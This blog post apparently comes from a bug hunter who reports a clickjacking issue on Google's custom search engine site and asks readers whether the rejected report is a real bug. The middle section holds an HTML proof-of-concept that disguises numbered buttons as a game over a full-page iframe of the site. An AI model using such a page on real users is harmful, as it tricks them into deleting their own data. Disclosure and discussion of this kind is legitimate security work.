I Found Clickjacking on Google CSE. Is This Important?
While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone’s CSE.
Summary: Attacker can delete victim’s CSE.
Steps to reproduce:
- Go to https://cse.google.com/
- It can be embedded into any webpage.
- Attacker may manipulate HTML template so it can delete victim’s CSE.
I wrote an exploit code for clickjacking and here is the exploit code:
<center>
<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>
By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.
About how attacker can make someone unconsciously delete their CSE, you can check my video POC here:
Enough about the explanation.
Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone’s data (CSE), isn’t this a bug? But the response I got was very surprising.
The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people’s data.
What do you think? Is this a bug? Or is it just me who overestimates this as a bug?
This article already published in dev.to.